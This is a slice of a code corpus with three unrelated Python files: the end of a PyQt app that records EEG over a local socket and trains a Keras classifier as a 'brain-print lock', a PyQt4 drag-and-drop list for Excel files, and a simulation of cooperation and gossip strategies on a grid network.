#此函数是控制整个采样,训练, 匹配测试的过程。\n global filename,total_EEG_data_number_for_test\n global step,directly_load_model_flag,openfile_name,directly_load_filename\n filename=ui.lineEdit.text() #写入文件名\n\n if step==3: # 匹配测试\n disable_Gui()\n ui.label.setText(\"匹配测试中...\")\n ui.label.repaint()\n ui.pushButton.setText(\"匹配测试中...\") \n ui.pushButton.repaint()\n\n if directly_load_model_flag==False:\n model=load_model(filename+'_key.h5')\n if directly_load_model_flag==True:\n model=load_model(directly_load_filename)\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect((server_address,5204)) #5204 为 OPENBCI GUI的缺省服务器段的发送端口\n EEG_data_for_test=np.zeros([total_EEG_data_number_for_test,total_EEG_Features]) # EEG_data_for_test为采样的测试EEG帧。\n temp_total_EEG_data_number_for_test=total_EEG_data_number_for_test\n total_EEG_data_number_for_test=1 #把total_EEG_data_number_for_test赋值给temp_total_EEG_data_number_for_test后,total_EEG_data_number_for_test变为1,只是为了GUI的进度条显示测试的进度%。\n match_counter=0 # 用于计数EEG通过测试的个数。\n for times in range(temp_total_EEG_data_number_for_test): #这个大循环,内嵌一个1的小循环。 \n for k in range(total_EEG_data_number_for_test):\n EEG_data_one_line=(s.recv(1024).decode('utf-8')).split('A') ####按照字符\"A\"来截断每一条EEG数据,分割成24小份\n for i in range(total_EEG_Features):\n if len(EEG_data_one_line)==25: #这个判断是为了避免有时候读取EEG时候,遇到换行符丢失的现象。\n EEG_data_for_test[k][i]=float(EEG_data_one_line[i])\n else:\n EEG_data_for_test[k][i]=EEG_data_for_test[k-1][i]\n\n test=model.predict(EEG_data_for_test,verbose = 1)\n\n for k in range(total_EEG_data_number_for_test):\n if test[k]>=match_triger:\n match_counter+=1\n ui.progressBar.setProperty(\"value\", (times+1)/temp_total_EEG_data_number_for_test*100) \n\n result_text=\"匹配率为\"+str(match_counter/temp_total_EEG_data_number_for_test*100)+\"%\"\n ui.label.setText(result_text)\n ui.label.repaint()\n ui.lcdNumber.display(match_counter/temp_total_EEG_data_number_for_test*100)\n QApplication.processEvents() #用于PyQt界面的刷新,保证流畅程度。\n result_text=\"测试结束,最终匹配率为\"+str(match_counter/temp_total_EEG_data_number_for_test*100)+\"%\"\n ui.label.setText(result_text)\n ui.label.repaint()\n\n total_EEG_data_number_for_test=temp_total_EEG_data_number_for_test #重新恢复全局变量total_EEG_data_number_for_test的值。\n ui.pushButton.setText(\"开始匹配测试\") \n ui.pushButton.repaint()\n enable_Gui()\n\n if step==2: #机器学习\n disable_Gui()\n ui.label.setText(\"开始机器学习你的脑纹。\")\n ui.label.repaint()\n ui.pushButton.setText(\"2-设置中...\") \n ui.pushButton.repaint()\n\n\n ######################################### 开始训练 ######################################\n \n ####################### 读取代训练的EEG数据############################\n f = open(filename+'EEG.txt', 'r') #读取代训练的EEG数据\n All_EEG_data_lines=f.readlines()\n EEG_data_A=np.zeros([total_EEG_data_number,total_EEG_Features])\n\n for k in range(total_EEG_data_number):\n EEG_data_one_line=(All_EEG_data_lines[k].split('A')) ####按照字符\"A\"来截断每一条EEG数据,分割成24小份\n for i in range(total_EEG_Features):\n if len(EEG_data_one_line)==25: #这个判断是为了避免有时候读取EEG时候,遇到换行符丢失的现象。\n EEG_data_A[k][i]=float(EEG_data_one_line[i])\n else:\n EEG_data_A[k][i]=EEG_data_A[k-1][i]\n f.close()\n\n ###############读取代训练的EEG数据完毕######################\n\n\n ###############开始读取代陪训的Random 1/2 EEG数据######################\n f = open('random_EEG_1.txt', 'r') #这是用于参与训练的他人EEG\n All_EEG_data_lines=f.readlines()\n EEG_data_B=np.zeros([total_EEG_data_number,total_EEG_Features])\n\n for k in range(total_EEG_data_number):\n EEG_data_one_line=(All_EEG_data_lines[k].split('A')) ####按照字符\"A\"来截断每一条EEG数据,分割成24小份\n for i in range(total_EEG_Features):\n if len(EEG_data_one_line)==25: #这个判断是为了避免有时候读取EEG时候,遇到换行符丢失的现象。\n EEG_data_B[k][i]=float(EEG_data_one_line[i])\n else:\n EEG_data_B[k][i]=EEG_data_B[k-1][i]\n f.close()\n\n ###############读取random_EEG_1完毕######################\n\n f = open('random_EEG_2.txt', 'r') #这也是用于参与训练的他人EEG\n All_EEG_data_lines=f.readlines()\n EEG_data_C=np.zeros([total_EEG_data_number,total_EEG_Features])\n\n for k in range(total_EEG_data_number):\n EEG_data_one_line=(All_EEG_data_lines[k].split('A')) ####按照字符\"A\"来截断每一条EEG数据,分割成24小份\n for i in range(total_EEG_Features):\n if len(EEG_data_one_line)==25: #这个判断是为了避免有时候读取EEG时候,遇到换行符丢失的现象。\n EEG_data_C[k][i]=float(EEG_data_one_line[i])\n else:\n EEG_data_C[k][i]=EEG_data_C[k-1][i]\n f.close()\n\n ###############读取random_EEG_2完毕######################\n ##################读取代陪训的Random 1/2 EEG数据######################\n\n ########################开始合成总的数据样本(包括待训练数据,以及两个陪训数据#############################\n y0 = np.ones([total_EEG_data_number,1]) \n y1 = np.zeros([total_EEG_data_number,1]) \n y2 = np.zeros([total_EEG_data_number,1]) \n x=np.vstack((EEG_data_A,EEG_data_B,EEG_data_C))\n y = np.vstack((y0,y1,y2)) \n\n ########################开始搭建神经网络#############################\n model=Sequential()\n model.add(Dense(240, input_shape=(24,)))\n model.add(Activation('relu'))\n model.add(Dropout(0.2))\n\n model.add(Dense(240,kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01)))\n model.add(Activation('relu'))\n model.add(Dropout(0.2))\n\n model.add(Dense(240,kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01)))\n model.add(Activation('relu'))\n model.add(Dropout(0.2))\n\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n\n model.compile(loss='binary_crossentropy',optimizer='rmsprop',metrics=['accuracy'])\n ########################神经网络搭建完毕#############################\n \n\n ################这个tb,是为了使用TensorBoard########################\n tb = TensorBoard(log_dir='./logs', # log 目录\n histogram_freq=0, # 按照何等频率(epoch)来计算直方图,0为不计算\n batch_size=32, # 用多大量的数据计算直方图\n write_graph=True, # 是否存储网络结构图\n write_grads=False, # 是否可视化梯度直方图\n write_images=False,# 是否可视化参数\n embeddings_freq=0, \n embeddings_layer_names=None, \n embeddings_metadata=None) \n\n # 在命令行,先conda activate envs,然后进入本代码所在的目录,然后用 tensorboard --logdir=logs/ 来看log\n # 然后打开chrome浏览器,输入http://localhost:6006/ 来查看\n # 如果出现tensorboard错误,那么需要修改 ...\\lib\\site-packages\\tensorboard\\manager.py,其中keras环境下的这个文件,我已经修改好了。\n ########################开始训练#############################\n for i in range(int(100/100)): #这个for,是1次性训练,是为了在TensorBoard中查看训练情况。\n #for i in range(100): #这个for,只是为了进度条的显示,所以分成 100次来训练。\n model.fit(x, y, epochs=int(training_times/100*100), batch_size=training_batch_size,verbose = 1,shuffle=True,callbacks=[tb]) #这一行带callbacks,是为了使用TensorBoard\n #model.fit(x, y, epochs=int(training_times/100), batch_size=training_batch_size,verbose = 1,shuffle=True) #这一行带callbacks,所以无法使用TensorBoard\n ui.progressBar.setProperty(\"value\", i+1)\n QApplication.processEvents() #用于PyQt界面的刷新,保证流畅程度。\n\n model.save(filename+'_key.h5')\n ########################训练完毕,并保存训练好的神经网络#############################\n\n ui.label.setText(\"你的脑纹锁设置成功!\")\n ui.label.repaint()\n ui.pushButton.setText(\"开始匹配测试\") \n ui.pushButton.repaint()\n ui.progressBar.setProperty(\"value\",0)\n step=3\n ui.label_2.setText(\"目前载入的是\"+filename+\"的已经训练好的脑纹\")\n ui.label_2.repaint()\n enable_Gui()\n\n if step==1: #### 录制脑电波\n disable_Gui()\n ui.label.setText(\"开始录制你的脑纹信息,请保持不动。\")\n ui.label.update()\n ui.pushButton.setText(\"1-录制脑纹中...\") \n ui.pushButton.repaint()\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect((server_address,5204))\n f = open(filename+'EEG.txt', 'w')\n for k in range(total_EEG_data_number):\n EEG_data=(s.recv(1024).decode('utf-8'))\n EEG_data_to_write=EEG_data+'\\r\\n'\n f.write(EEG_data_to_write)\n ui.progressBar.setProperty(\"value\", k/total_EEG_data_number*100+2)\n QApplication.processEvents() #用于PyQt界面的刷新,保证流畅程度。\n f.close()\n step=2\n ui.label_2.update()\n ui.label.setText(\"接下来神经网络开始学习并设置你的脑纹。\")\n ui.label.update()\n ui.pushButton.setText(\"2-开始机器学习\") \n ui.pushButton.repaint()\n enable_Gui()\n if step==0:\n ui.label.setText(\"返回第一步,请输入你的名字。\")\n ui.label.update()\n ui.pushButton.setText(\"1-重新开始录制脑纹\") \n ui.pushButton.repaint()\n ui.label_2.setText(\"目前没有载入任何已经训练好的脑纹。\")\n ui.label_2.repaint()\n step=1\n\ndef reset():\n global step,directly_load_model_flag\n step=0\n directly_load_model_flag=False\n ui.label_2.setText(\"目前没有载入任何已经训练好的脑纹。\")\n ui.label_2.repaint()\n ui.lineEdit.setText(\"请输入你的名字\")\n action() \n\ndef update_labels():\n ui.label_4.setText(\"EEG总采样帧数:\"+str(total_EEG_data_number))\n ui.label_5.setText(\"每次训练的帧数:\"+str(training_batch_size))\n ui.label_6.setText(\"训练的总次数:\"+str(training_times))\n ui.label_7.setText(\"用于识别的帧数:\"+str(total_EEG_data_number_for_test))\n\ndef apply_parameters():\n global server_address,total_EEG_data_number,training_times,training_batch_size,total_EEG_data_number_for_test\n server_address=ui.lineEdit_2.text()\n total_EEG_data_number=int(ui.horizontalSlider.value()*total_EEG_data_number_times) #读取n条EEG数据\n total_EEG_Features=24 #这是固定的。每一条EEG数据都有24个参数值。\n training_batch_size=int(ui.horizontalSlider_2.value()*4) #每次训练输入的EEG帧数\n training_times=int(ui.horizontalSlider_3.value()*4) #训练的次数\n total_EEG_data_number_for_test=int(ui.horizontalSlider_4.value())\n update_labels()\n\n\n\n\ndef reset_parameters():\n global server_address,total_EEG_data_number,training_times,training_batch_size,total_EEG_data_number_for_test\n ui.horizontalSlider.setValue(50)\n ui.horizontalSlider_2.setValue(50)\n ui.horizontalSlider_3.setValue(50)\n ui.horizontalSlider_4.setValue(50)\n ui.lineEdit_2.setText(\"127.0.0.1\")\n server_address=ui.lineEdit_2.text()\n total_EEG_data_number=int(ui.horizontalSlider.value()*total_EEG_data_number_times) #读取n条EEG数据\n total_EEG_Features=24 #这是固定的。每一条EEG数据都有24个参数值。\n training_batch_size=int(ui.horizontalSlider_2.value()*4) #每次训练输入的EEG帧数\n training_times=int(ui.horizontalSlider_3.value()*4) #训练的次数\n total_EEG_data_number_for_test=int(ui.horizontalSlider_4.value())\n \n #print(\"reset\",server_address,total_EEG_data_number,training_times,training_batch_size,total_EEG_data_number_for_test)\n update_labels()\n\n\ndef load_saved_model():\n global step,directly_load_model_flag,openfile_name,directly_load_filename\n openfile_name = QFileDialog.getOpenFileName(ui,'选择文件','','h5 files(*.h5)')\n print(openfile_name[0])\n directly_load_filename=openfile_name[0]\n directly_load_model_flag=True\n if directly_load_filename!='':\n ui.label.setText(\"你的脑纹锁设置成功!\")\n ui.label.repaint()\n ui.pushButton.setText(\"开始匹配测试\") \n ui.pushButton.repaint()\n ui.progressBar.setProperty(\"value\",0)\n step=3\n fileinfo = QFileInfo(directly_load_filename);\n fileName = fileinfo.fileName();\n ui.label_2.setText(\"目前载入的已经训练好的脑纹是: \"+fileName[:-7])\n ui.label_2.repaint()\n ui.lineEdit.setText(fileName[:-7])\n ui.lineEdit.repaint()\n\ndef disable_Gui():\n ui.pushButton.setEnabled(False)\n ui.pushButton_2.setEnabled(False)\n ui.pushButton_3.setEnabled(False)\n ui.pushButton_4.setEnabled(False)\n ui.horizontalSlider.setEnabled(False)\n ui.horizontalSlider_2.setEnabled(False)\n ui.horizontalSlider_3.setEnabled(False)\n ui.horizontalSlider_4.setEnabled(False)\n\ndef enable_Gui():\n ui.pushButton.setEnabled(True)\n ui.pushButton_2.setEnabled(True)\n ui.pushButton_3.setEnabled(True)\n ui.pushButton_4.setEnabled(True)\n ui.horizontalSlider.setEnabled(True)\n ui.horizontalSlider_2.setEnabled(True)\n ui.horizontalSlider_3.setEnabled(True)\n ui.horizontalSlider_4.setEnabled(True)\n\n\n\napp = QApplication(sys.argv)\nmainWindow = QMainWindow()\nui =Ui_MainWindow()\nui.setupUi(mainWindow)\n# setup stylesheet\n#app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n\n\nui.progressBar.setProperty(\"value\", 0)\nui.pushButton.setText(\"1-开始录制脑纹\")\nui.label_2.setText(\"目前没有载入任何已经训练好的脑纹。\")\nui.label_2.repaint() \nui.pushButton.clicked.connect(action)\nui.pushButton_2.clicked.connect(reset)\nui.pushButton_3.clicked.connect(load_saved_model)\nui.pushButton_4.clicked.connect(reset_parameters)\n\nui.horizontalSlider.sliderMoved.connect(apply_parameters)\nui.horizontalSlider_2.sliderMoved.connect(apply_parameters)\nui.horizontalSlider_3.sliderMoved.connect(apply_parameters)\nui.horizontalSlider_4.sliderMoved.connect(apply_parameters)\n\nmainWindow.show()\nsys.exit(app.exec_())","sub_path":"MindLocker-backup.py","file_name":"MindLocker-backup.py","file_ext":"py","file_size_in_byte":19857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"131109795","text":"import os\nimport sys\n\nfrom PyQt4.QtGui import QApplication\nfrom PyQt4 import QtCore, QtGui\nfrom PyQt4.QtGui import (QGridLayout, QHBoxLayout, QLabel, QWidget,\n QMessageBox, QPushButton, QVBoxLayout, QListWidget)\n\n\nclass FileList(QListWidget):\n def __init__(self, parent=None):\n super(FileList, self).__init__(parent)\n self.setAcceptDrops(True)\n self.setIconSize(QtCore.QSize(25, 25))\n\n def dragEnterEvent(self, event):\n if event.mimeData().hasUrls:\n event.accept()\n else:\n event.ignore()\n\n def dragMoveEvent(self, event):\n if event.mimeData().hasUrls:\n event.setDropAction(QtCore.Qt.CopyAction)\n event.accept()\n else:\n event.ignore()\n\n def dropEvent(self, event):\n if event.mimeData().hasUrls:\n event.setDropAction(QtCore.Qt.CopyAction)\n event.accept()\n links = []\n for url in event.mimeData().urls():\n links.append(str(url.toLocalFile()))\n self.emit(QtCore.SIGNAL(\"dropped\"), links)\n else:\n event.ignore()\n\n\nclass CreditCard(QWidget):\n def __init__(self, parent=None):\n super(CreditCard, self).__init__(parent)\n\n fileLabel = QLabel(\"Excel files:\")\n self.fileList = FileList(self)\n self.connect(self.fileList, QtCore.SIGNAL(\"dropped\"), self.fileDrop)\n\n self.cashdepo = QPushButton(\"&Cash Depo\")\n self.cashdepo.show()\n self.crediCard = QPushButton(\"C&redit Card\")\n self.crediCard.show()\n\n self.cashdepo.clicked.connect(self.getCashDepo)\n self.crediCard.clicked.connect(self.getCreditCard)\n\n buttonLayout1 = QVBoxLayout()\n buttonLayout1.addWidget(self.cashdepo, QtCore.Qt.AlignTop)\n buttonLayout1.addWidget(self.crediCard)\n buttonLayout1.addStretch()\n\n mainLayout = QGridLayout()\n mainLayout.addWidget(fileLabel, 0, 0)\n mainLayout.addWidget(self.fileList, 1, 0)\n mainLayout.addLayout(buttonLayout1, 1, 1)\n\n self.setLayout(mainLayout)\n self.setWindowTitle(\"Credit Card & Cash Depo XL\")\n\n def fileDrop(self, l):\n for url in l:\n if os.path.exists(url):\n print(url)\n if url.endswith('.xls'):\n icon = QtGui.QIcon(url)\n pixmap = icon.pixmap(25, 25)\n item = QtGui.QListWidgetItem(url, self.fileList)\n item.setIcon(icon)\n item.setStatusTip(url)\n else:\n QtGui.QMessageBox.warning(self, \"Non-Excel File\", \"Cannot add non-excel file\")\n\n def getCashDepo(self):\n filename = self.getFileList()\n for f in filename:\n print\n print(f.text())\n\n def getCreditCard(self):\n pass\n\n def getFileList(self):\n items = []\n for i in range(self.fileList.count()):\n items.append(self.fileList.item(i))\n\n return items\n\n\nif __name__ == '__main__':\n\n app = QApplication(sys.argv)\n ccard = CreditCard()\n ccard.show()\n\n sys.exit(app.exec_())\n","sub_path":"creditCard-qt4.py","file_name":"creditCard-qt4.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"580503806","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 10 13:49:29 2018\r\n@author: Lucia Pie\r\n\"\"\"\r\nimport networkx as nx\r\nimport itertools as it\r\nimport random\r\nimport calculation as calc\r\nfrom math import exp\r\n\r\n\r\ndef creat_network(rows, cols, neigh_num):\r\n g = nx.grid_2d_graph(rows, cols, periodic = False) # periodic set to True creates a toroid\r\n \r\n if neigh_num == 8:\r\n # adding second order connections\r\n new_edges = []\r\n \r\n # saving new edges to create\r\n for node in g.nodes():\r\n neighbors = g.neighbors(node)\r\n neighbor_pairs = it.combinations(neighbors, 2)\r\n for pair in neighbor_pairs:\r\n common_node = list((set(g.neighbors(pair[0])) & set(g.neighbors(pair[1]))) - {node})\r\n if common_node:\r\n if (node, common_node[0]) not in new_edges and (common_node[0], node) not in new_edges:\r\n new_edges.append((node, common_node[0]))\r\n \r\n # creating new edges\r\n for node_pair in new_edges:\r\n g.add_edge(node_pair[0], node_pair[1])\r\n \r\n elif neigh_num == 12:\r\n # adding second order connections\r\n new_edges = []\r\n \r\n # saving new edges to create\r\n for node in g.nodes():\r\n neighbors = g.neighbors(node)\r\n neighbor_pairs = it.combinations(neighbors, 2)\r\n for pair in neighbor_pairs:\r\n if (pair[0], pair[1]) not in new_edges and (pair[1], pair[0]) not in new_edges:\r\n new_edges.append((pair[0], pair[1]))\r\n \r\n # creating new edges\r\n for node_pair in new_edges:\r\n g.add_edge(node_pair[0], node_pair[1])\r\n \r\n elif neigh_num != 4:\r\n print('Invalid option for neigh_num.')\r\n \r\n return g\r\n \r\ndef network_initialization(g, cols, c_strategy_init, g_strategy_init, randomseed):\r\n random.seed(randomseed)\r\n rows = int(g.number_of_nodes() / cols)\r\n for node in g.nodes():\r\n g.node[node]['cooperation'] = random.choice(c_strategy_init)\r\n g.node[node]['gossip'] = random.choice(g_strategy_init)\r\n g.node[node]['last_c_rep'] = [['NA'] * cols for i in range(rows)] # how people remember others' last behavior\r\n g.node[node]['c_str_rep'] = [['NA'] * cols for i in range(rows)] # whether people know others' actual strategy\r\n g.node[node]['g_str_rep'] = [['NA'] * cols for i in range(rows)]\r\n g.node[node]['rep_num'] = [[0] * cols for i in range(rows)] # how many times the agent has received gossip about another agent\r\n \"\"\"\r\n Now I suppose that the more gossip one has received, the more likely he would know one's true strategy.\r\n In reality, the information can be inaccurate. In the future, I'll change it to a real model-based strategy.\r\n \"\"\"\r\n g.node[node]['inter_with_agent'] = [[0] * cols for i in range(rows)] # how many times have the agent interacted with the current agent\r\n \"\"\"\r\n It is designed especially for the new O2 who would act nicely twice at the beginning.\r\n \"\"\"\r\n g.node[node]['last_g_rep'] = [['NA'] * cols for i in range(rows)]\r\n g.node[node]['accum_payoff'] = 0.\r\n g.node[node]['inter_time'] = 0 # how many times an agent has interacted in the whole process\r\n g.node[node]['aver_payoff'] = 0. # aver_payoff in the whole process\r\n g.node[node]['last_payoff'] = 0.\r\n g.node[node]['iter_payoff_all'] = 0.\r\n g.node[node]['iter_inter_time'] = 0\r\n g.node[node]['iter_inter_avg'] = 0.\r\n g.node[node]['last_action'] = 'NA'\r\n g.node[node]['last_gossip'] = 'NA' # last time when this agent was chosen in a gossip phase, whether he gossiped or not\r\n g.node[node]['inf_accur'] = 0.\r\n return g\r\n\r\ndef cooperation(g, group_num, subset_size, c, r):\r\n # initialization for the current iteration\r\n for node in g:\r\n g.node[node]['iter_payoff_all'] = 0.\r\n g.node[node]['iter_inter_time'] = 0\r\n g.node[node]['iter_inter_avg'] = 0.\r\n \r\n # choose the pairs/groups to interact\r\n # only modify this part if switch to a PGG\r\n \"\"\"\r\n We may need to think about whether a full interaction will bring about a different result,\r\n especially when every one interact with all of his neighbors.\r\n \"\"\" \r\n group_list = calc.selectfromlist(list(g.edges()), min(group_num, len(list(g.edges()))))\r\n \r\n for group in group_list:\r\n # decide their action, action is saved in 'last_action'\r\n for node in group:\r\n if g.node[node]['cooperation'] == 'O1' or g.node[node]['cooperation'] == 'O3':\r\n # whether there is a gossiper neighbor in the PGG\r\n gossiper_in_neighbor = calc.count_in_list(g.node[node]['last_g_rep'], list(set(g.neighbors(node)) & set(group)), 'G')\r\n \r\n if gossiper_in_neighbor > 0:\r\n g.node[node]['last_action'] = 'C'\r\n elif g.node[node]['cooperation'] == 'O3':\r\n defector_num = calc.count_in_list(g.node[node]['last_c_rep'], group, 'D')\r\n if g.node[node]['last_c_rep'][node[0]][node[1]] == 'D': # don't count for their own reputation\r\n defector_num -= 1\r\n if defector_num >= subset_size / 2.:\r\n g.node[node]['last_action'] = 'D'\r\n else:\r\n g.node[node]['last_action'] = 'C'\r\n else:\r\n g.node[node]['last_action'] = 'D'\r\n \r\n elif g.node[node]['cooperation'] == 'O2':\r\n defector_num = calc.count_in_list(g.node[node]['last_c_rep'], group, 'D')\r\n if g.node[node]['last_c_rep'][node[0]][node[1]] == 'D': # don't count for their own reputation\r\n defector_num -= 1\r\n if defector_num >= subset_size / 2.:\r\n g.node[node]['last_action'] = 'D'\r\n else:\r\n g.node[node]['last_action'] = 'C'\r\n \r\n # would act nicely twice if any of the agents in the group is new\r\n for node2 in group:\r\n if node2 == node:\r\n continue\r\n elif g.node[node]['inter_with_agent'][node2[0]][node2[1]] < 2:\r\n g.node[node]['last_action'] = 'C'\r\n \r\n elif g.node[node]['cooperation'] == 'O4':\r\n# # assume that reputation is transparent\r\n defector_num = calc.count_in_nodes(g, group, 'cooperation', 'D')\r\n \r\n# # assume that people need to KNOW about other's strategies but it's possible for them to know the strategies\r\n# defector_num = calc.count_in_list(g.node[node]['c_str_rep'], group, 'D')\r\n# if g.node[node]['c_str_rep'][node[0]][node[1]] == 'D': # don't count for their own reputation\r\n# defector_num -= 1\r\n# \r\n# if defector_num >= subset_size / 2.:\r\n# g.node[node]['last_action'] = 'D'\r\n# else:\r\n# g.node[node]['last_action'] = 'C'\r\n# \r\n# # would act nicely twice if any of the agents in the group is new\r\n# for node2 in group:\r\n# if node2 == node:\r\n# continue\r\n# elif g.node[node]['inter_with_agent'][node2[0]][node2[1]] < 2:\r\n# g.node[node]['last_action'] = 'C'\r\n \r\n else:\r\n g.node[node]['last_action'] = g.node[node]['cooperation']\r\n \r\n # cooperation game\r\n count_C = calc.count_in_nodes(g, group, 'last_action', 'C')\r\n aver_pay = count_C * c * r / float(subset_size)\r\n\r\n for node in group: \r\n g.node[node]['inter_time'] += 1\r\n g.node[node]['iter_inter_time'] += 1\r\n if g.node[node]['last_action'] == 'C':\r\n g.node[node]['accum_payoff'] += aver_pay - c\r\n g.node[node]['iter_payoff_all'] += aver_pay - c\r\n g.node[node]['last_payoff'] = aver_pay - c\r\n else:\r\n g.node[node]['accum_payoff'] += aver_pay\r\n g.node[node]['iter_payoff_all'] += aver_pay\r\n g.node[node]['last_payoff'] = aver_pay\r\n g.node[node]['aver_payoff'] = g.node[node]['accum_payoff'] / g.node[node]['inter_time']\r\n g.node[node]['iter_inter_avg'] = g.node[node]['iter_payoff_all'] / g.node[node]['iter_inter_time']\r\n \r\n # agents in the cooperation game update their partner's reputation\r\n # know their neighbors' last behavior\r\n for node2 in group:\r\n if node2 == node:\r\n continue\r\n g.node[node]['inter_with_agent'][node2[0]][node2[1]] += 1\r\n if node2 not in list(g.neighbors(node)):\r\n continue\r\n g.node[node]['last_c_rep'][node2[0]][node2[1]] = g.node[node2]['last_action']\r\n# g.node[node]['rep_num'][node2[0]][node2[1]] += 1\r\n \"\"\"\r\n I commented it because I assume that people can't know the partner's true strategy through direct interaction.\r\n They can only get this infomration through gossip.\r\n \"\"\"\r\n\r\n return g\r\n\r\ndef gossip_talk(g, gossiper_node, target_node, receiver_node, gc):\r\n if target_node == receiver_node:\r\n return g\r\n else:\r\n g.node[receiver_node]['rep_num'][target_node[0]][target_node[1]] += 1\r\n g.node[gossiper_node]['last_gossip'] = 'G'\r\n g.node[receiver_node]['last_g_rep'][gossiper_node[0]][gossiper_node[1]] = 'G'\r\n g.node[gossiper_node]['accum_payoff'] -= gc\r\n g.node[gossiper_node]['iter_payoff_all'] -= gc \r\n g.node[gossiper_node]['last_payoff'] -= gc\r\n g.node[gossiper_node]['aver_payoff'] = g.node[gossiper_node]['accum_payoff'] / g.node[gossiper_node]['inter_time']\r\n g.node[gossiper_node]['iter_inter_avg'] = g.node[gossiper_node]['iter_payoff_all'] / g.node[gossiper_node]['iter_inter_time']\r\n return g\r\n\r\ndef non_gossip_talk(g, gossiper_node, receiver_node):\r\n g.node[receiver_node]['last_g_rep'][gossiper_node[0]][gossiper_node[1]] = 'N'\r\n g.node[gossiper_node]['last_gossip'] = 'N'\r\n return g\r\n \r\ndef gossiping(g, gossiper_num, target_num, receiver_num, gc):\r\n# a fixed amount of agents will be chosen, but the agents chosen are not necessarily gossipers\r\n# the chosen agent will talk to people, but he will gossip only when he is a gossiper and knows something\r\n # choose gossipers\r\n gossiper_size = min(gossiper_num, len(list(g.nodes())))\r\n gossiper_list = calc.selectfromlist(g.nodes(), gossiper_size)\r\n \r\n # talking\r\n for node in gossiper_list:\r\n g.node[node]['last_gossip'] = 'N'\r\n \r\n # choose some neighbors to talk\r\n # the receiver list can be someone else in future models\r\n receiver_list_all = []\r\n receiver_size = min(receiver_num, len(list(g.neighbors(node))))\r\n for neighbor in g.neighbors(node):\r\n receiver_list_all.append(neighbor)\r\n receiver_list = calc.selectfromlist(receiver_list_all, receiver_size)\r\n \r\n if g.node[node]['gossip'] == 'G':\r\n # choose some targets to gossip about\r\n target_list_all = []\r\n target_list = []\r\n for target in g.nodes():\r\n if g.node[node]['c_str_rep'][target[0]][target[1]] != 'NA' or g.node[node]['last_c_rep'][target[0]][target[1]] != 'NA':\r\n if target == node:\r\n continue\r\n target_list_all.append(target)\r\n target_size = min(target_num, len(target_list_all))\r\n target_list = calc.selectfromlist(target_list_all, target_size)\r\n \"\"\"\r\n Now people choose targets from the agents whose reputation/last_action has already be known.\r\n So as long as you're a gossiper, you can always find someone you know to gossip about.\r\n It's unlikely that a gossiper don't talk during a gossiping phase.\r\n So now gossip rate is approximately the same as proportion of gossipers.\r\n \"\"\"\r\n \r\n # gossip to each receiver about each target\r\n for target in target_list:\r\n for receiver in receiver_list:\r\n g = gossip_talk(g, node, target, receiver, gc)\r\n \r\n elif g.node[node]['gossip'] == 'N':\r\n for receiver in receiver_list:\r\n g = non_gossip_talk(g, node, receiver) # if someone is chosen but didn't gossip, people will think the agent is not a gossiper\r\n\r\n return g\r\n\r\ndef reproduction(g, cols, fermi_num, payoff_index, s, mu_rate, c_strategy, g_strategy):\r\n n = g.number_of_nodes()\r\n fermi_index_all = list(range(n))\r\n random.shuffle(fermi_index_all)\r\n # the indices of the students chosen in the current iteration\r\n fermi_index = [fermi_index_all[i] for i in range(min(fermi_num, n))]\r\n \r\n for student_index in fermi_index:\r\n student = calc.order2position(student_index, cols)\r\n \r\n # learn only from immediate neighbors\r\n teacher = random.choice(list(g.neighbors(student)))\r\n \r\n # can also try letting them learn from a random teacher\r\n # teacher = random.choice(list(g.nodes()))\r\n \r\n p = 1. / (1 + exp(0 - s * (g.node[teacher][payoff_index] - g.node[student][payoff_index])))\r\n \r\n if random.random() < p:\r\n g.node[student]['cooperation'] = g.node[teacher]['cooperation']\r\n g.node[student]['gossip'] = g.node[teacher]['gossip']\r\n \r\n # born as a completely new agent\r\n g.node[student]['accum_payoff'] = 0\r\n g.node[student]['inter_time'] = 0\r\n g.node[student]['inter_with_agent'] = [[0] * cols for i in range(int(n / cols))]\r\n\r\n if random.random() < mu_rate:\r\n g.node[student]['cooperation'] = random.choice(c_strategy)\r\n g.node[student]['gossip'] = random.choice(g_strategy)\r\n\r\n return g\r\n\r\ndef modelupdate(g, victim_num, target_num, f_rate, rs, rep_diff):\r\n victim_list = calc.selectfromlist(g.nodes(), victim_num)\r\n \r\n for victim in victim_list:\r\n target_list = calc.selectfromlist(list(g.nodes()), target_num)\r\n \r\n for target in target_list:\r\n if target == victim:\r\n continue\r\n if random.random() < f_rate: \r\n if g.node[victim]['rep_num'][target[0]][target[1]] > 0:\r\n g.node[victim]['rep_num'][target[0]][target[1]] -= 1\r\n p = 1 / (1 + exp(- rs * (g.node[victim]['rep_num'][target[0]][target[1]] - rep_diff)))\r\n if random.random() < p:\r\n g.node[victim]['c_str_rep'][target[0]][target[1]] = g.node[target]['cooperation']\r\n else:\r\n g.node[victim]['c_str_rep'][target[0]][target[1]] = g.node[victim]['last_c_rep'][target[0]][target[1]]\r\n \r\n for node in g.nodes():\r\n rep_num = 0.\r\n sum_num = 0.\r\n for node2 in g.nodes():\r\n sum_num += 1\r\n if g.node[node2]['cooperation'] == g.node[node]['c_str_rep'][node2[0]][node2[1]]:\r\n rep_num += 1\r\n g.node[node]['inf_accur'] = rep_num / sum_num\r\n \r\n return g\r\n\r\n\r\n\"\"\"\r\n############\r\n# Note:\r\n############\r\nNow the setting is that when people interact directly, they'll only remember their partner's behavior in their 'last_c_rep,'\r\nbut they won't update their 'c_str_rep' until the modelupdate phase.\r\n\r\n\r\n############\r\n# To do list:\r\n############\r\nadding trust rate\r\n\"\"\"","sub_path":"phases.py","file_name":"phases.py","file_ext":"py","file_size_in_byte":16027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
